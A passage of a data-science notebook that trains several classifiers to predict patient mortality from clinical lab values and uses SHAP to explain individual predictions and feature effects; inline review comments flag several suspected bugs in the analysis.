# +
# Functions to calculate the correlations between features
def get_redundant_pairs(df):
    """Return the diagonal and lower-triangular (col_i, col_j) label pairs.

    These are the pairs to discard from an unstacked correlation matrix so
    that each column pair (and the trivial self-correlations) appears once.
    """
    cols = df.columns
    return {
        (cols[i], cols[j])
        for i in range(df.shape[1])
        for j in range(i + 1)
    }


def get_top_abs_correlations(df, n=5):
    """Return the *n* strongest absolute pairwise correlations in *df*.

    The result is a Series indexed by (column, column), sorted by
    |correlation| descending, with duplicates and the diagonal removed.
    """
    flattened = df.corr().abs().unstack()
    deduplicated = flattened.drop(labels=get_redundant_pairs(df))
    return deduplicated.sort_values(ascending=False)[0:n]
# -
# Calculate correlation matrix and identify highest performing features
corr_matrix = X.corr()
# NOTE(review): get_top_abs_correlations calls .corr() internally, so passing
# corr_matrix computes the correlation OF the correlation matrix — the intent
# was probably get_top_abs_correlations(X, n=10); verify.
get_top_abs_correlations(corr_matrix,n=10)
# ### Chapter 3.3 Method - Machine Learning Models
# #### 1. Split into training and testing set
from sklearn.model_selection import cross_val_score, StratifiedKFold
from sklearn import preprocessing
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score
from sklearn.model_selection import RandomizedSearchCV
from sklearn.model_selection import cross_val_score, KFold
# 4-fold shuffled split with a fixed seed for reproducibility.
crossval = KFold(n_splits=4,shuffle=True,random_state=420)
# NOTE(review): the loop overwrites the split on every iteration, so only the
# LAST fold is kept as the train/test partition — confirm this is intended.
for train_index, test_index in crossval.split(X):
    Xtrain, Xtest, Ytrain, Ytest = X.iloc[train_index,:], X.iloc[test_index,:], Y.iloc[train_index], Y.iloc[test_index]
# #### 2. Get Statistics
# Percentile summary of the training split only (used later for reporting).
Xtrain_percentiles = get_distribution(Xtrain,Ytrain)
# +
# This function returns the highest and lowest feature values.
def get_percentile_categories(percentiles, sample):
    """Bucket each feature value of *sample* against its column's percentiles.

    For feature ``col`` the bucket is the index (0-4) of the first percentile
    row that exceeds the value; values not below any percentile — including
    NaNs, which fail every ``<`` comparison — fall into bucket 4.

    Parameters
    ----------
    percentiles : pandas.DataFrame
        At least 5 rows (ascending percentile levels), one column per feature.
    sample : sequence of feature values, one per column of *percentiles*.

    Returns
    -------
    numpy.ndarray of bucket indices, same length as *sample*.
    """
    category = np.zeros((len(sample),))
    for col, value in enumerate(sample):
        category[col] = next(
            (band for band in range(5) if value < percentiles.iloc[band, col]),
            4,
        )
    return category
def print_important_percentiles(percentiles,X,idx):
    """Print features of patient *idx* whose values fall in the extreme bands.

    *percentiles* is a 16-row frame as produced by ``get_distribution``;
    row 15 flags binary features, which are skipped.  Bucket 4 (from
    ``get_percentile_categories``) is reported as VERY HIGH and bucket 0
    as VERY LOW.

    NOTE(review): per get_percentile_categories, bucket 4 covers everything
    at or above the 84th percentile while bucket 0 is below the 2.3rd, so
    "VERY HIGH" is a wider band than "VERY LOW" — confirm this asymmetry
    is intended.
    """
    sample = X.iloc[idx,:]
    labels = X.columns.values
    category = get_percentile_categories(percentiles,sample)
    # First pass: report extreme-high values.
    for j in range(len(sample)):
        if np.isnan(sample[j]):
            continue
        # Skip binary features — percentile bands are meaningless for them.
        if percentiles.iloc[15,j]==True:
            continue
        if category[j]==4:
            print(labels[j]+", value "+str(sample[j])+" is VERY HIGH")
    # Second pass: report extreme-low values.
    for j in range(len(sample)):
        if np.isnan(sample[j]):
            continue
        if percentiles.iloc[15,j]==True:
            continue
        if category[j]==0:
            print(labels[j]+", value "+str(sample[j])+" is VERY LOW")
# Intermediate LOW/HIGH band reporting, kept disabled for reference.
# for j in range(len(sample)):
#     if np.isnan(sample[j]):
#         continue
#     if percentiles.iloc[15,j]==True:
#         continue
#     if category[j]==1:
#         print(labels[j]+", value "+str(sample[j])+" is LOW")
# for j in range(len(sample)):
#     if np.isnan(sample[j]):
#         continue
#     if percentiles.iloc[15,j]==True:
#         continue
#     if category[j]==3:
#         print(labels[j]+", value "+str(sample[j])+" is HIGH")
# -
# #### 3. Imputation
# +
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.impute import IterativeImputer
Imputer = IterativeImputer(max_iter=20)
# Train a MICE imputer on the Training Set
# FIt the Imputer on the Test Set
# Keep un-imputed copies so later explanations can show measured values only.
Xtrain_bef_imp = Xtrain.copy()
Xtest_bef_imp = Xtest.copy()
# Fit on the training split only, then apply to test — avoids test-set leakage.
Xtrain[features_chosen] = Imputer.fit_transform(Xtrain[features_chosen])
Xtest[features_chosen] = Imputer.transform(Xtest[features_chosen])
# -
# Report extreme feature values for test patient 1 (pre-imputation values).
print_important_percentiles(Xtrain_percentiles,Xtest_bef_imp,1)
# #### 4. Normalisation
# +
# Train a normaliser on the Training Set
# Fit the normaliser on the test set
# Min-max scale every column to [0, 1]; parameters come from the training split.
scaler = preprocessing.MinMaxScaler()
scaler.fit(Xtrain)
Xtrain[Xtrain.columns.values] = scaler.transform(Xtrain[Xtrain.columns.values])
Xtest[Xtrain.columns.values] = scaler.transform(Xtest[Xtrain.columns.values])
# -
# Notebook display of the full design-matrix shape.
X.shape
# ### Chapter 3.4.2 Building Machine Learning Models on the Dataset
# #### 1. Train a LogReg model
# +
from sklearn.linear_model import LogisticRegression
from sklearn.calibration import CalibratedClassifierCV
# NOTE(review): throughout this section roc_auc_score (and f1_score) are fed
# hard predict() labels rather than predict_proba scores, so the reported
# "ROC-AUC" is the label-based value — confirm this is intended.
# NOTE(review): max_iter=5 is very low for LogisticRegression — verify convergence.
LR = LogisticRegression(solver='liblinear',penalty="l2",multi_class='ovr',max_iter=5)
LR.fit(Xtrain,Ytrain)
print("Logistic Regression")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,LR.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,LR.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,LR.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,LR.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,LR.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,LR.predict(Xtest)), 6)))
# Sigmoid (Platt) calibration so all five models emit comparable probabilities.
LR_calibrated = CalibratedClassifierCV(LR, method='sigmoid', cv=5)
LR_calibrated.fit(Xtrain,Ytrain)
# -
# #### 2. Train a Random Forest
# +
from sklearn.ensemble import RandomForestClassifier
# [n_estimators, min_samples_leaf, max_depth]
rf_params = [200,3,7]
RF_best = RandomForestClassifier(n_estimators=rf_params[0],min_samples_leaf=rf_params[1],max_depth=rf_params[2],criterion='entropy')
RF_best.fit(Xtrain,Ytrain)
print("Random Forest")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,RF_best.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,RF_best.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,RF_best.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,RF_best.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,RF_best.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,RF_best.predict(Xtest)), 6)))
RF_calibrated = CalibratedClassifierCV(RF_best, method='sigmoid', cv=5)
RF_calibrated.fit(Xtrain,Ytrain)
# -
# #### 3. Train an XGBoost Model
# +
# 3. XGBoost
# [learning_rate, n_estimators, max_depth, min_child_weight]
xgb_params = [0.02,200,5,7]
from xgboost.sklearn import XGBClassifier
XGBoost = XGBClassifier(learning_rate=xgb_params[0],n_estimators=xgb_params[1],max_depth=xgb_params[2],min_child_weight=xgb_params[3])
XGBoost.fit(Xtrain,Ytrain)
print("XGBoost")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,XGBoost.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,XGBoost.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,XGBoost.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,XGBoost.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,XGBoost.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,XGBoost.predict(Xtest)), 6)))
XGBoost_calibrated = CalibratedClassifierCV(XGBoost, method='sigmoid', cv=5)
XGBoost_calibrated.fit(Xtrain,Ytrain)
# -
# #### 4. Train an MLP
# +
from sklearn.neural_network import MLPClassifier
# NOTE(review): max_iter=25 is small for an MLP of this size — verify convergence.
MLP_best = MLPClassifier(hidden_layer_sizes=(80,20,5), max_iter=25, alpha=0.0015, solver='adam', verbose=None, tol=0.00001)
MLP_best.fit(Xtrain,Ytrain)
print("MLP")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,MLP_best.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,MLP_best.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,MLP_best.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,MLP_best.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,MLP_best.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,MLP_best.predict(Xtest)), 6)))
MLP_calibrated = CalibratedClassifierCV(MLP_best, method='sigmoid', cv=5)
MLP_calibrated.fit(Xtrain,Ytrain)
# -
# #### 5. Train an SVC
# +
from sklearn.svm import SVC
# probability=True so the SVC can produce class probabilities (needed below).
SVC_best = SVC(C=5,kernel='rbf',probability=True)
SVC_best.fit(Xtrain,Ytrain)
print("SVM")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,SVC_best.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,SVC_best.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,SVC_best.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,SVC_best.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,SVC_best.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,SVC_best.predict(Xtest)), 6)))
SVC_best_calibrated = CalibratedClassifierCV(SVC_best, method='sigmoid', cv=5)
SVC_best_calibrated.fit(Xtrain,Ytrain)
# -
# #### 8. Get SHAPs
import shap
shap.initjs()
import warnings
# NOTE(review): blanket warning suppression hides sklearn/shap warnings —
# consider scoping it to the noisy calls.
warnings.filterwarnings("ignore")
# ### Chapter 3.4.3: Basic Explainability Outputs - Choosing instances A, B, C
# #### 1. Choose instances A, B and C
# Calibrated-SVC positive-class probability for every test patient.
test = SVC_best_calibrated.predict_proba(Xtest)[:,1]
# Notebook display: probability for the candidate instance.
test[147]
# Scan for borderline (0.60-0.65) predictions on patients who actually survived.
for i in range(990):
    if test[i] > 0.60 and test[i] < 0.65:
        if Ytest['expire_flag'].iloc[i] == 0:
            print(i)
# #### 2. Get the model outputs for A, B and C
idx = 147
print(LR_calibrated.predict_proba(Xtest)[idx,1])
print(RF_calibrated.predict_proba(Xtest)[idx,1])
print(XGBoost_calibrated.predict_proba(Xtest)[idx,1])
print(MLP_calibrated.predict_proba(Xtest)[idx,1])
# Ensemble output: simple mean of the five calibrated probabilities.
output_value = LR_calibrated.predict_proba(Xtest)[idx,1] + RF_calibrated.predict_proba(Xtest)[idx,1] + XGBoost_calibrated.predict_proba(Xtest)[idx,1] + MLP_calibrated.predict_proba(Xtest)[idx,1] + SVC_best_calibrated.predict_proba(Xtest)[idx,1]
output_value /= 5
print("Average Value " + str(output_value))
# #### 3. Get the SHAP outputs
# Get the SHAP values for each domain
# Kernel SHAP over each calibrated model; the background set is summarised to
# 5 k-means centroids to keep explanation cost manageable.
LR_SHAP = shap.KernelExplainer(LR_calibrated.predict_proba, shap.kmeans(Xtrain,5))
RF_SHAP = shap.KernelExplainer(RF_calibrated.predict_proba, shap.kmeans(Xtrain,5))
XGB_SHAP = shap.KernelExplainer(XGBoost_calibrated.predict_proba, shap.kmeans(Xtrain,5))
MLP_SHAP = shap.KernelExplainer(MLP_calibrated.predict_proba, shap.kmeans(Xtrain,5))
SVM_SHAP = shap.KernelExplainer(SVC_best_calibrated.predict_proba, shap.kmeans(Xtrain,5))
def return_shaps(X, idx, shap_function):
    """Stack per-explainer SHAP rows for one instance; the last row is their mean.

    Parameters
    ----------
    X : pandas.DataFrame of features.
    idx : int row position of the instance to explain.
    shap_function : list of SHAP explainers exposing ``shap_values`` and
        ``expected_value``.

    Returns
    -------
    numpy.ndarray of shape ``(len(shap_function) + 1, X.shape[1])`` whose first
    rows hold each explainer's positive-class SHAP values and whose final row
    is their element-wise average.
    """
    n_models = len(shap_function)
    instance = X.iloc[idx:idx + 1, :]
    shap_combined = np.zeros((n_models + 1, X.shape[1]))
    expected_value = 0
    for row, explainer in enumerate(shap_function):
        # [1] selects the positive class of the two-class explanation.
        shap_combined[row, :] = explainer.shap_values(instance)[1]
        # Accumulated but not returned; kept to mirror the original contract.
        expected_value += explainer.expected_value[1] / n_models
    shap_combined[-1, :] = shap_combined[:n_models, :].mean(axis=0)
    return shap_combined
# Per-model + averaged SHAP rows for instances A (86), B (404) and C (147).
shap_values_A = return_shaps(Xtest,86,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP,SVM_SHAP])
shap_values_B = return_shaps(Xtest,404,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP,SVM_SHAP])
shap_values_C = return_shaps(Xtest,147,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP,SVM_SHAP])
shap.initjs()
# Force plot Instance A
# Base value = mean of the five explainers' expected values; row 5 is the
# model-averaged SHAP row; pre-imputation features are displayed.
shap.force_plot(0.2*(RF_SHAP.expected_value[1] + LR_SHAP.expected_value[1] + XGB_SHAP.expected_value[1] + MLP_SHAP.expected_value[1] + SVM_SHAP.expected_value[1]),
                shap_values_A[5,:], Xtest_bef_imp.iloc[86,:], feature_names=features_chosen)
# Force plot Instance B
shap.force_plot(0.2*(RF_SHAP.expected_value[1] + LR_SHAP.expected_value[1] + XGB_SHAP.expected_value[1] + MLP_SHAP.expected_value[1] + SVM_SHAP.expected_value[1]),
                shap_values_B[5,:], Xtest_bef_imp.iloc[404,:], feature_names=features_chosen)
# Force plot Instance C
shap.force_plot(0.2*(RF_SHAP.expected_value[1] + LR_SHAP.expected_value[1] + XGB_SHAP.expected_value[1] + MLP_SHAP.expected_value[1] + SVM_SHAP.expected_value[1]),
                shap_values_C[5,:], Xtest_bef_imp.iloc[147,:], feature_names=features_chosen)
# #### 4. Print the most important SHAP values
# Notebook display: training-split percentile bands for one feature.
Xtrain_percentiles['Urea Nitrogen']
### Print the set of most important SHAP values
print("Instance A")
for i in np.argsort(np.abs(shap_values_A[5,:]))[::-1][:10]:
    print(features_chosen[i] + " Value: %.4f, SHAP: %.4f" % (Xtest_bef_imp.iloc[86,i], shap_values_A[5,i]))
### Print the set of most important SHAP values
print("Instance B")
for i in np.argsort(np.abs(shap_values_B[5,:]))[::-1][:10]:
    print(features_chosen[i] + " Value: %.4f, SHAP: %.4f" % (Xtest_bef_imp.iloc[404,i], shap_values_B[5,i]))
### Print the set of most important SHAP values
print("Instance C")
for i in np.argsort(np.abs(shap_values_C[5,:]))[::-1][:10]:
    print(features_chosen[i] + " Value: %.4f, SHAP: %.4f" % (Xtest_bef_imp.iloc[147,i], shap_values_C[5,i]))
### Print the set of most important SHAP values
print("Instance C")
for i in np.argsort(np.abs(shap_values_C[5,:]))[::-1][:10]:
    print(features_chosen[i] + " %.4f" % (shap_values_C[5,i]) )
# ### 9. Get SHAPs on the model-wide
# #### Feature Importance - Feature Value Plot
# Define a model that only returns the final averaged SHAP value.
def return_shaps_final(X, idx, shap_function):
    """Average the positive-class SHAP rows of several explainers for one row.

    Parameters
    ----------
    X : pandas.DataFrame of features.
    idx : int row position of the instance to explain.
    shap_function : list of SHAP explainers exposing ``shap_values`` and
        ``expected_value``.

    Returns
    -------
    numpy.ndarray of shape ``(1, X.shape[1])`` containing the explainer-wise
    mean SHAP values for row *idx*.
    """
    n_models = len(shap_function)
    instance = X.iloc[idx:idx + 1, :]
    per_model = np.zeros((n_models, X.shape[1]))
    expected_value = 0
    for row, explainer in enumerate(shap_function):
        # [1] selects the positive class of the two-class explanation.
        per_model[row, :] = explainer.shap_values(instance)[1]
        # Accumulated but not returned; kept to mirror the original contract.
        expected_value += explainer.expected_value[1] / n_models
    averaged = per_model.mean(axis=0)
    return averaged.reshape(1, X.shape[1])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
# NOTE(review): 990 test rows and 89 features are hard-coded, and SVM_SHAP is
# omitted from this ensemble average — confirm both are intentional.
shap_population = np.zeros((990,89))
for i in range(990):
    shap_population[i,:] = return_shaps_final(Xtest,i,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_LR = np.zeros((990,89))
for i in range(990):
    if i%10 == 0:
        print(i)
    shap_population_LR[i,:] = return_shaps_final(Xtest,i,[LR_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_RF = np.zeros((990,89))
for i in range(990):
    if i%10 == 0:
        print(i)
    shap_population_RF[i,:] = return_shaps_final(Xtest.iloc[:990,:],i,[RF_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_XGB = np.zeros((990,89))
for i in range(990):
    if i%10 == 0:
        print(i)
    shap_population_XGB[i,:] = return_shaps_final(Xtest.iloc[:990,:],i,[XGB_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_MLP = np.zeros((990,89))
for i in range(990):
    if i%10 == 0:
        print(i)
    shap_population_MLP[i,:] = return_shaps_final(Xtest.iloc[:990,:],i,[MLP_SHAP])
# -
# Notebook display of the per-model SHAP matrix.
shap_population_LR
# ### Chapter 3.4.4 FI - FV Curves
# Model-averaged explanation for instance C (row 147).
exp_A = 0.25*((shap_population_LR) + (shap_population_RF) + (shap_population_XGB) + (shap_population_MLP))[147,:]
exp_A
exp_A[np.argsort(exp_A)[::-1]]
features_chosen[np.argsort(exp_A)[::-1]]
# NOTE(review): return_important_features is not defined in this part of the
# notebook — presumably defined in an earlier cell; verify before rerunning.
_ = return_important_features(exp_A,features_chosen,16)
# Display of the SVC probability vector from earlier (rebound on the next line).
test
# What-if probe: perturb one feature of instance C and re-score the MLP.
test = Xtest.iloc[147:148,:].copy()
print(MLP_calibrated.predict_proba(test))
test['MCHC'] = 0.35
print(MLP_calibrated.predict_proba(test))
# #### Plot a scatter plot of features
import seaborn as sns; sns.set(color_codes=True)
# #### Feature 1: Age
# Create the arrays for X and Y, remove NANs
# NOTE(review): shap_population_rank is not defined in this part of the
# notebook — presumably an argsort of mean |SHAP| from an earlier cell; verify.
idx = shap_population_rank[0]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
# Additionally drop values <= 5 before plotting this feature.
mask = plot_X > 5
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# ### Chapter 3.4.4 FI-FV Plots
# #### Feature 2: RDW
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Feature 3
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[2]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Feature 4
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[3]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Plot a graph with a higher level of granularity
# +
# Ensemble hard prediction: mean of the five models' labels, rounded.
Y_pred = np.round(0.2*(LR_calibrated.predict(Xtest) + RF_calibrated.predict(Xtest) + XGBoost_calibrated.predict(Xtest) + MLP_calibrated.predict(Xtest) + SVC_best_calibrated.predict(Xtest)))
## For the RDW feature, split between (1) Ytest and (2) Y_pred
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
# -
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
# hue = predicted class; marker style = 1 where the prediction disagrees with
# the true label (XOR of prediction and truth).
ax = sns.scatterplot(plot_X, plot_Y,hue=Y_pred[mask],style=np.logical_xor(Y_pred[mask],Ytest[mask].values.ravel()).astype(int))
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Fish for something interesting
shap_population_rank
# +
Y_pred = np.round(0.2*(LR_calibrated.predict(Xtest) + RF_calibrated.predict(Xtest) + XGBoost_calibrated.predict(Xtest) + MLP_calibrated.predict(Xtest) + SVC_best_calibrated.predict(Xtest)))
## For the RDW feature, split between (1) Ytest and (2) Y_pred
idx = shap_population_rank[24]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y,hue=Y_pred[mask],style=np.logical_xor(Y_pred[mask],Ytest[mask].values.ravel()).astype(int))
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# -
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
idx = shap_population_rank[1]
# Smoothed (KDE) density view of the same FI-FV relationship.
ax = sns.kdeplot(plot_X, plot_Y, shade=True)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# ### Chapter 3.4.6 Explainability across Different Models
# +
#### Get basic SHAP values for the four models
# Get a bunch of SHAP values for the entire population
# NOTE(review): this recomputes the four per-model SHAP matrices already built
# above (without the progress prints) — expensive duplication; verify it is needed.
shap_population_LR = np.zeros((990,89))
for i in range(990):
    shap_population_LR[i,:] = return_shaps_final(Xtest,i,[LR_SHAP])
shap_population_RF = np.zeros((990,89))
for i in range(990):
    shap_population_RF[i,:] = return_shaps_final(Xtest,i,[RF_SHAP])
shap_population_XGB = np.zeros((990,89))
for i in range(990):
    shap_population_XGB[i,:] = return_shaps_final(Xtest,i,[XGB_SHAP])
shap_population_MLP = np.zeros((990,89))
for i in range(990):
    shap_population_MLP[i,:] = return_shaps_final(Xtest,i,[MLP_SHAP])
# -
# #### 1. Plot Logistic Regression
# +
# FI-FV scatter of the same ranked feature, per individual model.
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_LR[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for Logistic Regression')
plt.show()
# -
# #### 2. Plot Random Forest
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_RF[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for Random Forest')
plt.show()
# -
# #### 3. Plot XGBoost
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_XGB[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for XGBoost')
plt.show()
# -
# #### 4. Plot MLP
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_MLP[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for the Multilayer Perceptron')
plt.show()
# +
# Calculate the amount of alignment in models
# -
# ### Chapter 3.4.5 Explainability Curves
import seaborn as sns; sns.set(color_codes=True)
# +
# Resolution (number of synthetic feature values) for the explainability curves.
bins = 400
# Define these features
feature_values_A_flip = np.zeros((bins,89)); feature_values_B_flip = np.zeros((bins,89)); feature_values_C_flip = np.zeros((bins,89))
# SHAP values
shap_values_A_exp = np.zeros((bins,89)); shap_values_B_exp = np.zeros((bins,89)); shap_values_C_exp = np.zeros((bins,89))
# -
# #### Patient A
# Ten most influential features for instance A (model-averaged SHAP row).
for i in np.argsort(np.abs(shap_values_A[-1,:]))[::-1][:10]:
    print(str(i) + " " + features_chosen[i] + ": %.4f" % (shap_values_A[-1,i]))
##
# Sweep feature 26 of instance A across [0, 1) and re-explain at each step.
idx = 26;
for i in range(bins):
    print(i)
    instance_temp = Xtest.iloc[86:87,:].copy()
    instance_temp.iloc[:,idx] = i/bins
    feature_values_A_flip[i,:] = instance_temp
    shap_values_A_exp[i,:] = return_shaps_final(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# +
## Plot the graph
idx = 26; bins = 400;
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Plot SHAP
# NOTE(review): this plots shaps_A_all, which is produced by the raw cell
# below, not the shap_values_A_exp array filled above — verify which is meant.
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
                   (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
         shaps_A_all[:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[86,idx],shap_values_A[-1,idx]+0.008,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-0.01), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]),
